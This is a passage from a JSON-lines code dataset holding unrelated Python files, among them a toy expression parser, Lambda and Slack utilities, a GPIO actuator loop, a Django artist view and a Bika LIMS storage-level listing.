causes a circular import error\n from Bcfg2.Server.SchemaUpdater import update_database, UpdaterError\n # Be sure the database is ready for new schema\n try:\n update_database()\n except UpdaterError:\n raise SystemExit(1)\n load_stats(statsdata,\n encoding,\n verb,\n logger,\n quick=q,\n location=platform.node())\n","sub_path":"src/lib/Bcfg2/Server/Reports/importscript.py","file_name":"importscript.py","file_ext":"py","file_size_in_byte":13100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"638453508","text":"from sys import argv, exit\nfrom time import time\nfrom hParsing import *\nfrom L5_special import *\nfrom L5_matrices import *\n\nvar = {\"id\":[0,\"num.int\"]}\nexpr = {}\ntemp_var = {}\n# ------\n# SYMBOLS\npfx = [chr(402),\"$\",\"@\",\"..\"]\nop = [\"+\",\"-\",\"*\",\"/\",\"%\",\"^\"]\nparens = [\"(\",\")\",\"[\",\"]\",\"{\",\"}\"]\nseparators = pfx+op+parens+[\",\",\"\\\"\",\"=\",\"|\",\";\"]\nifx = {\"plus\":\"x + y\"}\n# ------\n# GLOBAL VARIABLES\npfile = False\npexpr = False\nprange = False\nctype = \"NULL.NULL\"\n# ------\n# INNER GLOBAL VARIABLES\ndT = False # displayTypes\nt = False\n# ------\n\ndef Parse(code):\n ph = Phrase(code)\n ret = []\n while True:\n if ph.tokn == \"EoF\":\n break\n elif ph.tokn == \"\\n\": ph.nextToken()\n else: ret.append(Expression(ph))\n return ret\n\ndef Expression(ph):\n global pexpr,dT,t\n if ph.tokn == \"$\":\n ph.nextToken()\n pexpr = True\n if pfile:\n if ph.tokn.isalpha() or ph.tokn or prange == \"@\":\n pass\n else: handleError(ph,\"Syntax\",\"Expected declarations not found\",pfile)\n ret = Operation(ph, 0)\n if ph.tokn == \"@\":\n ph.expect(\"@\")\n if ph.tokn == \"@\": # @@Assert Statement\n ph.nextToken()\n while ph.tokn == \"-\":\n ph.nextToken()\n if ph.tokn == \"showTypes\": dT = not dT\n elif ph.tokn == \"showTime\": t = not t\n elif ph.tokn == \"exit\": exit()\n ph.nextToken()\n else: # @Print Statement\n obj = str(Operation(ph,0))\n while ph.tokn == \",\":\n ph.nextToken()\n if ph.tokn == \",\":\n obj+= \" \"\n ph.nextToken\n else: obj+= str(Operation(ph,0))\n if pexpr: ret = \"@\"+obj\n else: ret = obj\n elif ph.tokn == \"=\":\n # Variable declaration\n ph.nextToken()\n name = ret\n if pexpr:\n expr[name] = [Operation(ph,0),ctype]\n ret = name+\" = \"+expr[name][0]\n else:\n if prange: temp_var[name] = [Operation(ph,0),ctype]\n else: var[name] = [Operation(ph,0),ctype]\n ret = \"\"\n if not pfile or dT:\n ret=name+\" <- \"\n if name in temp_var: ret+=\"|\"+str(temp_var[name][0])\n else: ret+=str(var[name][0])\n if dT: ret+=(\" : [\"+ctype+\"]\\n\")\n if prange: ret = \";@!;\"\n pexpr = False\n return ret\n\ndef Operation(ph, order):\n global ctype\n if order == 0:\n if ph.tokn == \"-\": # Handle unary minus\n ph.nextToken()\n ret = \"\"\n obj = Operation(ph, order+1)\n if dT: print(ret,atype,op,obj,ctype)\n if prefix(ctype) == \"num\": ret = -obj\n else: handleError(ph,\"Type\",\"Unary - not supported for \"+ctype,pfile)\n else: ret = Operation(ph, order+1)\n while ph.tokn in [\"+\",\"-\"]:\n op,atype = ph.tokn,ctype\n ph.nextToken()\n if ph.tokn == \"|\": #FOLD\n ph.nextToken()\n obj = Operation(ph, order+1)\n if same_prefix(atype,ctype):\n if prefix(ctype) == \"rng\":\n if op == \"+\": ret = ret + obj\n else: ret = ret - obj\n else:\n if prefix(ctype) == \"rng\": # X +- {...}\n if op == \"+\": ret = [ret+i for i in obj]\n else: ret = [ret-i for i in obj]\n else:\n if ph.tokn == \"+\":\n ph.nextToken()\n obj = Operation(ph, order+1)\n \n else:\n obj = Operation(ph, 
order+1)\n if dT: print(ret,atype,op,obj,ctype)\n if same_prefix(atype, ctype):\n # N+N S+S\n if pexpr: ret = str(ret)+op+str(obj) \n elif op == \"+\": ret += obj\n else:\n if guess_prefixes(atype,ctype,\"str\",\"str\"):\n ret = ret.replace(obj,\"\")\n else: ret -= obj\n elif prefix(atype) == \"rng\": # {...} +- x\n if op == \"+\": ret.append(obj) # Act like append\n else:\n try: ret.remove(obj)\n except: pass\n else: handleError(ph,\"Type\",atype+op+ctype+\" invalid types for +-.\",pfile)\n elif order == 1:\n ret = Operation(ph, order+1)\n while ph.tokn in [\"*\", \"/\"]:\n op,atype = ph.tokn,ctype\n ph.nextToken()\n obj = Operation(ph, order+1)\n if dT: print(ret,atype,op,obj,ctype)\n if guess_prefixes(atype,ctype,\"num\",\"num\"):\n if pexpr: ret = str(ret)+op+str(obj) \n elif op == \"*\": ret = ret * obj\n else: ret = ret / obj\n elif guess_prefixes(atype,ctype,\"rng\",\"num\"):\n if prefix(atype) == \"rng\" and suffix(ctype) == \"int\":\n ret = ret * obj\n elif prefix(ctype) == \"rng\":\n if op == \"+\": ret = [ret*i for i in obj]\n else: ret = [ret/i for i in obj]\n else: handleError(ph,\"Type\",atype+op+ctype+\" invalid types for */.\",pfile)\n elif guess_suffixes(atype,ctype,\"int\",\"str\",\"chr\"):\n if pexpr: ret = ret+op+obj\n elif op == \"*\": ret = ret * obj\n else: handleError(ph,\"Type\",\n \"Division not supported for \"+atype+\" and \"+ctype, pfile)\n #ctype = \"str.str\" # str/chr * int or int * str/chr\n else: handleError(ph,\"Type\",atype+op+ctype+\" invalid types for */.\",pfile)\n elif order == 2:\n ret = Operation(ph, order+1)\n while ph.tokn == \"^\":\n op,atype = ph.tokn,ctype\n ph.nextToken()\n obj = Operation(ph, order)\n if dT: print(ret,atype,op,obj,ctype)\n if guess_suffixes(atype,ctype,\"int\",\"int\",\"float\",\"float\"):\n if pexpr: ret = str(ret)+op+str(obj) \n else: ret = ret**obj\n else: handleError(ph,\"Type\",\n \"Exponentiation not supported for \"+atype+\" and \"+ctype, pfile)\n elif order == 3:\n ret = Operation(ph, order+1)\n while ph.tokn == \"%\":\n op,atype = ph.tokn,ctype\n ph.nextToken()\n obj = Operation(ph, order+1)\n if guess_suffixes(atype,ctype,\"int\",\"int\"):\n ret = ret%obj\n else: handleError(ph,\"Type\",\n \"Modulus not supported for \"+atype+\" and \"+ctype, pfile)\n else:\n ret = Term(ph)\n return ret\n\ndef Term(ph):\n global ctype\n ret = \"\"\n if ph.tokn.replace(\".\",\"\").replace(\"-\",\"\").isdigit():\n ctype = \"num\" # Number\n if pexpr:\n ret = ph.tokn\n ctype = \"num.int\"\n elif \".\" in ph.tokn:\n ret = float(ph.tokn)\n ctype = \"num.float\"\n else:\n ret = int(ph.tokn)\n ctype = \"num.int\"\n ph.nextToken()\n elif ph.tokn == chr(402) or ph.tokn == \"fract\":\n ret = Fraction(ph)\n ctype = \"num.fract\"\n elif ph.tokn.isalpha():\n ret = Label(ph)\n elif ph.tokn == \"\\\"\":\n # String\n ctype = \"str.str\"\n ret = String(ph)\n elif ph.tokn == \"{\":\n ret = Range(ph)\n elif ph.tokn == \"(\":\n # Parenthesis\n ph.nextToken()\n ret = Operation(ph, 0)\n ph.expect(\")\")\n if pexpr: ret = \"(\"+ret+\")\"\n #if dT and ret != \"\": print(str(ret)+\" : [\"+ctype+\"]\")\n #if pexpr: ctype = \"str.expr\"\n return ret\n\ndef Label(ph):\n global ctype\n ret,name = \"\",ph.tokn\n ph.nextToken()\n if ph.tokn == \"=\": ret = name\n elif name in list(var.keys())+list(temp_var.keys()):\n if pexpr: ret = name\n if name in temp_var:\n if pexpr: ret = name\n ctype = temp_var[name][1]\n else:\n ret = var[name][0]\n ctype = var[name][1]\n elif name in expr:\n if pexpr: ret = name\n else:\n gcode = separate(expr[name][0],separators)\n gh 
= Phrase(gcode.split())\n ret = Operation(gh,0)\n ctype = expr[name][1]\n else: handleError(ph,\"Name\",\"Invalid identifier\",pfile)\n return ret\n\ndef String(ph):\n ph.nextToken()\n ret = \"\"\n while True:\n if ph.tokn == \"EoF\":\n ph.fatalError(\"Unmatching quotes\")\n elif ph.tokn == \"\\\"\": break\n else:\n if ph.tokn == \"\\\\\": ret+= \" \"\n else: ret+= ph.tokn\n ph.nextToken()\n ph.nextToken()\n if pexpr: ret = \"\\\"\"+ret+\"\\\"\"\n return ret\n\ndef Fraction(ph):\n ph.nextToken()\n ret = 0\n num = Term(ph)\n if ph.tokn == \"/\": ph.nextToken()\n elif ph.tokn == \",\": ph.nextToken()\n den = Term(ph)\n if prefix(ctype) == \"num\":\n if pexpr: ret = \"fract \"+num+\" \"+den\n else: ret = Fract(num,den)\n else: handleError(ph,\"Type\",\"Invalid fraction\",pfile)\n return ret\n\ndef Range(ph):\n global pexpr,prange,temp_var,ctype\n ph.nextToken()\n ret = []\n stack = []\n if ph.tokn.isalpha() and ph.tokn not in list(var.keys())+list(expr.keys()):\n # {x in Range | ...}\n temp = ph.tokn\n ph.nextToken()\n if ph.tokn == \"in\": ph.nextToken()\n else:\n ph.expect(\"-\")\n ph.expect(\">\")\n stack = Range(ph)\n ph.expect(\"|\")\n temp_var[temp] = [0, complete_prefix(suffix(ctype))]\n while True:\n if ph.tokn in [\"EoF\",\"}\"]: break\n else:\n pexpr = True\n ret.append(Expression(ph))\n if ph.tokn in [\",\",\";\",\"|\"]:\n ph.nextToken()\n pexpr = False\n wret = Rng([])\n for obj in stack:\n for instruction in ret:\n gcode = separate(str(instruction), separators)\n gcode = gcode.replace(temp,str(obj))\n prange = True\n f = Expression(Phrase(gcode.split()))\n if f != \";@!;\": wret.append(f)\n prange = False\n temp_var = {}\n ret = wret\n else:\n # {a,b,c,d...}\n stack.append(Operation(ph,0))\n if ph.tokn in [\"to\",\"..\"] and prefix(ctype) == \"num\":\n ph.nextToken()\n # {a to b} or {a..b}\n stack.append(Operation(ph,0))\n ret = list(range(min(stack),max(stack)))\n if stack[0] == max(stack): # The list is reversed\n ret = ret[::-1]\n else:\n while True:\n if ph.tokn in [\"EoF\",\"}\"]: break\n elif ph.tokn == \",\": ph.nextToken()\n else: stack.append(Operation(ph,0))\n ret = Rng(stack)\n ctype = \"rng.\"+suffix(ctype)\n ph.expect(\"}\")\n return ret\n\n \nif len(argv) > 1:\n pfile = True\n # Handle whitespace\n code = readFile(argv[1]).replace(\"\\\" \\\"\",\"\\\"\\\\\\\"\")\n code = separate(code, separators)\n g = Parse(code.split())\n print(\"\".join(str(s) for s in g))\nelse:\n while True:\n code = str(input(\"> \"))\n if code == \"\\\\e\":break\n elif code != \"\":\n code = code.replace(\"\\\" \\\"\",\"\\\"\\\\\\\"\")\n code = separate(code,separators)\n p = time()\n g = (Parse(code.split()))\n print(\"\".join(str(s) for s in g))\n if t: print(\"[Time elapsed: \"+str(time()-p)+\"s]\")","sub_path":"Prototypes/L5/Px/L5Px.py","file_name":"L5Px.py","file_ext":"py","file_size_in_byte":11587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"143043830","text":"import json\nimport datetime\nimport decimal\nimport requests\nimport web3\nfrom web3 import Web3\nIGNORED_LIST = ['row_id', 'row_created', 'row_updated']\n\n\nclass Utils:\n def __init__(self):\n self.msg_type = {\n 0: 'info:: ',\n 1: 'err:: '\n }\n\n def report_slack(self, type, slack_msg, SLACK_HOOK):\n url = SLACK_HOOK['hostname'] + SLACK_HOOK['path']\n prefix = self.msg_type.get(type, \"\")\n print(url)\n payload = {\"channel\": \"#contract-index-alerts\",\n \"username\": \"webhookbot\",\n \"text\": prefix + slack_msg,\n \"icon_emoji\": \":ghost:\"\n }\n\n resp = 
requests.post(url=url, data=json.dumps(payload))\n print(resp.status_code, resp.text)\n\n def clean(self, value_list):\n for value in value_list:\n self.clean_row(value)\n\n def clean_row(self, row):\n for item in IGNORED_LIST:\n del row[item]\n\n for key in row:\n if isinstance(row[key], decimal.Decimal) or isinstance(row[key], datetime.datetime):\n row[key] = str(row[key])\n elif isinstance(row[key], bytes):\n if row[key] == b'\\x01':\n row[key] = 1\n elif row[key] == b'\\x00':\n row[key] = 0\n else:\n raise Exception(\"Unsupported bytes object. Key \" +\n str(key) + \" value \" + str(row[key]))\n\n return row\n\n def remove_http_https_prefix(self, url):\n url = url.replace(\"https://\", \"\")\n url = url.replace(\"http://\", \"\")\n return url\n\n def get_current_block_no(self, ws_provider):\n w3Obj = Web3(web3.providers.WebsocketProvider(ws_provider))\n return w3Obj.eth.blockNumber\n\n\ndef make_response(status_code, body, header=None):\n return {\n \"statusCode\": status_code,\n \"headers\": header,\n \"body\": body\n }\n\n\ndef validate_dict(data_dict, required_keys):\n for key in required_keys:\n if key not in data_dict:\n return False\n return True\n\n\ndef generate_lambda_response(status_code, message):\n return {\n 'statusCode': status_code,\n 'body': json.dumps(message),\n 'headers': {\n 'Content-Type': 'application/json',\n \"X-Requested-With\": '*',\n \"Access-Control-Allow-Headers\": 'Access-Control-Allow-Origin, Content-Type,X-Amz-Date,Authorization,X-Api-Key,x-requested-with',\n \"Access-Control-Allow-Origin\": '*',\n \"Access-Control-Allow-Methods\": 'GET,OPTIONS,POST'\n }\n }\n\n\ndef extract_payload(method, event):\n method_found = True\n payload_dict = None\n if method == 'POST':\n payload_dict = json.loads(event['body'])\n elif method == 'GET':\n payload_dict = event.get('queryStringParameters', {})\n else:\n method_found = False\n return method_found, payload_dict\n\n\ndef format_error_message(status, error, resource, payload, net_id):\n return json.dumps(\n {'status': status, 'error': error, 'resource': resource, 'payload': payload, 'network_id': net_id})\n","sub_path":"common/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"477210647","text":"import random\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\ndef apply_motion(d, stepsize):\n d[0] += d[2] * stepsize\n d[1] += d[3] * stepsize\n d[2] = max(-1.4, min(1.4, d[2] + random.gauss(0, stepsize)))\n d[3] = max(-1.4, min(1.4, d[3] + random.gauss(0, stepsize)))\n\ndef gen_data(filename, size=3000):\n start = np.array([0.0, 0.0, 0.0, 0.0])\n data = np.zeros((size, 4))\n data[0, :] = start\n maxdist = 0.01\n for i in range(1, size):\n apply_motion(start, 0.1)\n data[i, :] = start\n dist = np.linalg.norm(data[i-1, [0, 1]] - data[i, [0,1]])\n maxdist = max(maxdist, dist)\n plt.plot(data[[i-1, i], 0], data[[i-1, i], 1], color=(dist/maxdist, 1-(dist/maxdist), 0))\n plt.show()\n df = pd.DataFrame(data[:, [0,1]], columns=['x', 'y'])\n df.to_csv(filename)\n\ndef read_walk(filename):\n df = pd.read_csv(filename)\n plt.plot(df[['noisex']], df[['noisey']], color='r')\n plt.plot(df[['estx']], df[['esty']], color='b')\n plt.plot(df[['realx']], df[['realy']], color='g')\n plt.show()\n\nif __name__ == '__main__':\n 
gen_data('out-walk.csv')\n","sub_path":"generatewalk.py","file_name":"generatewalk.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"93672146","text":"# Randomisation\nimport random\n\nrandom_int = random.randint(1, 10) #gives a random integer between the given range\nprint(random_int)\n\nrandom_float = random.random() # random floating numbers between 0.9999999 - 0.9999999\nprint(random_float)\n\nrandom_float * 5 # random floating numbers between 0.9999999 - 4.9999999\n\n# Lists\n# A data structure, widely used.\nfruits = [\"Apple\", \"Pear\", \"Mango\"]\n\n# index starts with 0\nprint(fruits[0])\n\n# -1 will point to the last item\nprint(fruits[-1])\n\n# Reassign items\nfruits[1] = \"Orange\"\n\n# Add items in the end\nfruits.append(\"Banana\")\n\n# nested lists\nvegetables = [\"Spinach\", \"Tomatoes\", \"Celery\", \"Potatoes\"]\n\nnew_list = [fruits, vegetables]\n","sub_path":"Day_4/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"337507215","text":"import time\nimport network_management.socket_manager as sm\nfrom EmulatorGUI import GPIO\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\n\nGPIO.setup(11, GPIO.OUT, initial=GPIO.LOW)\n\n\n\nusername = \"remote_hub_actuator\"\nclient_socket = sm.get_socket()\n\n# register socket with transport layer\nregistered = False\nwhile not registered:\n registered = sm.register(username, client_socket)\n if not registered:\n print(\"Registration attempt failed\")\n time.sleep(1) # this might need better handling as currently it just\n # spams the network every second\n\n#messaging loop\nwhile True:\n # receive result, which is a list in the format [result_code, message]\n result = sm.receive_message(client_socket)\n \n result_code = result[0]\n result_message = result[1]\n # result code 'OK' indicates a message was successfully received\n if result_code == 'OK':\n message = result[1]\n print(message)\n\n if result_message == \"b'ON'\":\n GPIO.output(11, GPIO.HIGH)\n elif result_message == \"b'OFF'\":\n GPIO.output(11, GPIO.LOW)\n\n #GPIO.cleanup()\n\n \n \n \n\n # Other result codes you might want to handle for:\n # 'INVALID_HEADER' (This would indicate there is something wrong with the\n # network_config or socket_manager scripts)\n # 'NO_MESSAGES' (This is an error you'll get whenever there's no messages\n # and it probably doesn't need handling as long as your\n # receive loop keeps running)\n # 'ERROR' (This is if something inexplicably goes wrong)\n","sub_path":"actuator_remote_hub.py","file_name":"actuator_remote_hub.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"458306011","text":"import collections\n\n\nclass Solution:\n def checkIfCanBreak(self, s1: str, s2: str) -> bool:\n a1 = sorted([c for c in s1])\n a2 = sorted([c for c in s2])\n check = 0\n for i in range(len(a1)):\n if a1[i] == a2[i]:\n continue\n if check == 0:\n check = 1 if a1[i] > a2[i] else -1\n else:\n check2 = 1 if a1[i] > a2[i] else -1\n if check * check2 == -1:\n return False\n return True\n\n\ns = Solution()\nprint(s.checkIfCanBreak('abe', 
'acd'))\n","sub_path":"leetcode/2020/checkIfCanBreak.py","file_name":"checkIfCanBreak.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"226387368","text":"import numpy as np\n\n\ndef EO0(pop, test_func, rt):\n m = pop.shape[0]\n tt = np.diag(np.ones(m))\n temp = np.tile(pop, (m, 1)).T\n step_rd = np.random.normal(0, rt, (m, 1))\n tt *= step_rd\n temp += tt\n temp[temp > 1] = 1\n temp[temp < 0] = 0\n F = test_func.Func(temp)\n j = np.argmin(F)\n best = temp[:, j]\n if test_func.Func(best) < test_func.Func(pop):\n pop[:] = best[:]\n return pop\n","sub_path":"strategy/EO.py","file_name":"EO.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"589222112","text":"from django.shortcuts import redirect, render\n\nfrom ...forms import ArtistForm\nfrom ...models import Artist\n\n__all__ = (\n 'artist_add',\n)\n\n\ndef artist_add(request):\n # Implement in the HTML every input the Artist class can accept\n # (img_profile is excluded)\n # If the method is POST, process that data from request.POST,\n # create a new Artist object and move to artist_list\n # If the method is GET, display artist_add.html\n\n # ** The date of birth is received in YYYY-MM-DD format,\n # then converted to a date object using datetime.strptime\n\n # 1. Write artist_add.html\n # 2. Wire up the URL, mapped to ./artist/add/\n # 3. Check that GET requests work\n # 4. After setting the form method, branch in the artist_add() view on POST requests\n # 5. Check that POST request values arrive in request.POST\n # 6. Create an Artist instance using the values in request.POST\n # 7. After creation, redirect to the view for the 'artist:artist-list' URL name\n\n if request.method == 'POST':\n # Files sent as multipart/form-data\n # are found in the request.FILES attribute\n\n form = ArtistForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n return redirect('artist:artist-list')\n else:\n form = ArtistForm()\n\n context = {\n 'artist_form': form,\n }\n return render(request, 'artist/artist_add.html', context)\n","sub_path":"app/artist/views/artist/add.py","file_name":"add.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"577180813","text":"import subprocess\nimport os\n\n\n\"\"\"\nSimple Subprocess Exercise: Folder Files\nCreate a new text file for each directory with filename of the files as the\ncontent. 
(filename: directoryName.txt)\nFolder : Notes\n\"\"\"\np = os.path.join(os.getcwd(), 'Notes')\nos.chdir(p)\nfor d in os.listdir(p):\n dp = os.path.join(p, d)\n if os.path.isdir(dp):\n os.chdir(dp)\n files = [f.name for f in os.scandir()]\n _file = os.path.join(p, d+'.txt')\n for f in files:\n fp = open(_file, 'a+')\n subprocess.run(['echo', f], stdout = fp)\n","sub_path":"D13/subprocess/diana.py","file_name":"diana.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"432330173","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport math\nfrom coeffs import *\n\n#setting up plot\nfig = plt.figure()\nax = fig.add_subplot(111, aspect='equal')\n\nlrct = 3\nlen=100\ny = np.linspace(-5,5,len)\nx = np.power(y,2)/3\nP1 = np.vstack((x,y))\nx_par1 = P1\nplt.plot(x_par1[0,:],x_par1[1,:],label=\"Parabola1\")\n\nx = np.linspace(-5,5,len)\ny = np.power(x,2)/3\nP2 = np.vstack((x,y))\nx_par2 = P2\nplt.plot(x_par2[0,:],x_par2[1,:],label=\"Parabola2\")\n\nD = np.array([-3/8,-3/8])\nm = np.array([1,-1])\nT = line_dir_pt(m,D,-5,5)\n\nplt.plot(T[0,:],T[1,:],label='Common Tangent' )\n\nax.plot()\nplt.xlabel('$x$')\nplt.ylabel('$y$')\nplt.legend(loc='best')\nplt.axis('equal')\nplt.grid()\nplt.show()\n","sub_path":"ex-con1.py","file_name":"ex-con1.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"179605127","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\nimport json\n\nlabels = ['file', 'type']\n\nwith open('/home/user/notebooks/Work/Waste_management_data/list_of_containers.json', 'r') as f:\n file = json.load(f)\n\nfor num, i in enumerate(file):\n try:\n container_type = str(tuple(tuple(i.values())[0]['containers'].values())[0]['type_id'])\n except AttributeError:\n container_type = '0'\n \n labels.append([tuple(i.keys())[0], container_type])\n\nlabels = sorted(labels, key=lambda x: x[0])\nlabels = '\\n'.join([','.join(i) for i in labels])\n\nwith open('/home/user/notebooks/Work/Waste_management_data/annot.csv', 'w') as f:\n f.write(labels)\n","sub_path":"images_creating2.py","file_name":"images_creating2.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"240859580","text":"#!/usr/bin/python\n# coding=utf-8\nimport os\nnew = \"\"\npath = \"/home/ana/PS2/praticandoOBI/praticandoOBI/scripts/criajson/enunciados/\"\nfor filename in os.listdir(path):\n\tprint (filename)\n\tfor filename1 in os.listdir(path+filename):\n\t\tprint (filename1)\n\t\tpath2 = path+filename+\"/\"+filename1+\"/\"\n\t\tfor filename2 in os.listdir(path2):\n\t\t\tprint (filename2)\n\t\t\twith open(path2+filename2) as f:\n\t\t\t\twith open(path2+filename2, \"w\") as f1:\n\t\t\t\t\ttitulo = f.readline()\n\t\t\t\t\tprint(titulo)\n\t\t\t\t\tf1.write(titulo)\n\t\t\t\t\twhile True:\n\t\t\t\t\t\tnew = f.readline().replace('\\n','')\n\t\t\t\t\t\tprint(new)\n\t\t\t\t\t\tf1.write(new)\n\t\t\t\t\t\tif not new:\n\t\t\t\t\t\t\tbreak\n\t\t\t\n\t\t\t#\tf1.write(titulo)\n\t\t\t#\tf1.write(new)\n\n\n","sub_path":"praticandoOBI/scripts/provas/espacos.py","file_name":"espacos.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"514800900","text":"import logging\n\nfrom aiohttp import ClientSession, web\n\nfrom ..conf import permissions_url\nfrom ..utils.json import 
jsonb\n\nLOG = logging.getLogger(__name__)\n\ndef filter_hstore(hstores, schema_name):\n for hstore in hstores:\n v = hstore.get(schema_name, None)\n if v is not None:\n yield jsonb(v)\n\n\nasync def resolve_token(token, requested_datasets):\n # If the user is not authenticated (ie no token)\n # we pass (requested_datasets, False) to the database function: it will filter out the datasets list, with the public ones\n if token is None:\n return requested_datasets, False\n\n # Otherwise, we have a token and resolve the datasets with the permissions server\n # The permissions server will:\n # * filter out the datasets list, with the ones the user has access to\n # * return _all_ the datasets the user has access to, in case the datasets list is empty\n async with ClientSession() as session:\n async with session.post(\n permissions_url,\n headers = { 'Authorization': 'Bearer ' + token,\n 'Accept': 'application/json'},\n json = { 'datasets': list(requested_datasets) }, # will set the Content-Type to application/json\n ) as resp:\n if resp.status > 200:\n LOG.error('Permissions server error %d', resp.status)\n error = await resp.text()\n LOG.error('Error: %s', error)\n raise web.HTTPUnauthorized(reason=error)\n \n authorized_datasets = await resp.json()\n return authorized_datasets, True\n\n","sub_path":"beacon/utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"2780719","text":"from AccessControl import ClassSecurityInfo\nfrom Products.ATContentTypes.content import schemata\nfrom Products.Archetypes import atapi\nfrom Products.Archetypes.ArchetypeTool import registerType\nfrom Products.CMFCore import permissions\nfrom Products.CMFCore.utils import getToolByName\nfrom Products.CMFPlone.utils import _createObjectByType\nfrom Products.Five.browser.pagetemplatefile import ViewPageTemplateFile\nfrom bika.lims.browser import BrowserView\nfrom bika.lims.browser.bika_listing import BikaListingView\nfrom bika.lims.config import PROJECTNAME\nfrom bika.lims import bikaMessageFactory as _\nfrom bika.lims.utils import t\nfrom bika.lims.utils import tmpID\nfrom plone.app.layout.globals.interfaces import IViewView\nfrom bika.lims.content.bikaschema import BikaFolderSchema\nfrom plone.app.content.browser.interfaces import IFolderContentsView\nfrom plone.app.folder.folder import ATFolder, ATFolderSchema\nfrom zope.interface.declarations import implements\nfrom bika.lims.interfaces import IStorageLevels\n\nclass StorageLevelsView(BikaListingView):\n template = ViewPageTemplateFile('templates/storagelevels.pt')\n implements(IFolderContentsView, IViewView)\n\n def __init__(self, context, request):\n super(StorageLevelsView, self).__init__(context, request)\n path = '/'.join(self.context.getPhysicalPath())\n self.catalog = 'bika_setup_catalog'\n self.contentFilter = {'portal_type': 'StorageLevel',\n 'sort_on': 'sortable_title',\n 'path': {'query': path, 'depth': 1}}\n self.context_actions = {_('Add'):\n {'url': 'createObject?type_name=StorageLevel',\n 'icon': '++resource++bika.lims.images/add.png'}}\n self.title = (hasattr(self.context, 'Title') and self.context.Title() or\n self.context.translate(_(\"Storage Levels\")))\n self.icon = self.portal_url\n self.icon += \"/++resource++bika.lims.images/storagelocation_big.png\"\n self.description = \"\"\n self.show_sort_column = False\n self.show_select_row = False\n self.show_select_column = True\n self.pagesize = 25\n\n self.columns = 
{\n 'Title': {'title': _('Title'),\n 'index': 'sortable_title'},\n 'Description': {'title': _('Description'),\n 'toggle': True},\n 'Hierarchy': {'title': _('Hierarchy'),\n 'toggle': False},\n 'StockItemID': {'title': _('Stock item ID'),\n 'toggle': True},\n 'IsOccupied': {'title': _('Is Occupied'),\n 'toggle': False},\n }\n self.review_states = [\n {'id':'default',\n 'title': _('Active'),\n 'contentFilter': {'inactive_state': 'active'},\n 'transitions': [{'id':'deactivate'}, ],\n 'columns': ['Title',\n 'Description',\n 'Hierarchy',\n 'StockItemID',\n 'IsOccupied']},\n {'id':'inactive',\n 'title': _('Dormant'),\n 'contentFilter': {'inactive_state': 'inactive'},\n 'transitions': [{'id':'activate'}, ],\n 'columns': ['Title',\n 'Description',\n 'Hierarchy',\n 'StockItemID',\n 'IsOccupied']},\n {'id':'all',\n 'title': _('All'),\n 'contentFilter':{},\n 'columns': ['Title',\n 'Description',\n 'Hierarchy',\n 'StockItemID',\n 'IsOccupied']},\n ]\n\n def folderitems(self):\n items = BikaListingView.folderitems(self)\n for x in range(len(items)):\n if not items[x].has_key('obj'): continue\n obj = items[x]['obj']\n items[x]['replace']['Title'] = \"<a href='%s'>%s</a>\" % \\\n (items[x]['url'], items[x]['Title'])\n items[x]['StockItemID'] = obj.getStockItemID()\n items[x]['IsOccupied'] = 'yes' if obj.getIsOccupied() else 'no'\n items[x]['Hierarchy'] = obj.getHierarchy()\n return items\n\n\nclass AddStorageLevelView(BrowserView):\n \"\"\" Handler for the \"Add Storage levels\" button in Storage levels\n view.\n \"\"\"\n\n def StorageLevelTitleExists(self, title):\n catalog = getToolByName(self.context, 'bika_setup_catalog')\n #XXX ParentUID should be queried instead of looping\n for item in catalog(portal_type='StorageLevel', title=title):\n if item.getObject().getParentUID() == self.context.UID():\n return True\n return False\n\n def RepresentsInt(self, string):\n try:\n int(string)\n return True\n except ValueError:\n return False\n\n def __call__(self):\n form = self.request.form\n title = self.request.get('storagelevel-title', '')\n sequencestart = self.request.get('storagelevel-sequencestart', '')\n number = self.request.get('storagelevel-number', '')\n\n if not title and not number:\n message = ('error', ('Either the storage level title or the number '\n 'of items should be specified.'))\n elif number and (not self.RepresentsInt(number) or int(number) < 1):\n message = ('error', 'Number of items should be a positive integer.')\n elif sequencestart and (not self.RepresentsInt(sequencestart) or\n int(sequencestart) < 0):\n message = ('error', 'Sequence start should be a non-negative integer.')\n else:\n separator = title and number and \\\n self.context.bika_setup.getStorageLevelTitleSeparator() or ''\n sequencestart = sequencestart and int(sequencestart) or 1\n number = number and int(number) or 1\n\n for index in range(number):\n sequenced_index = number != 1 and 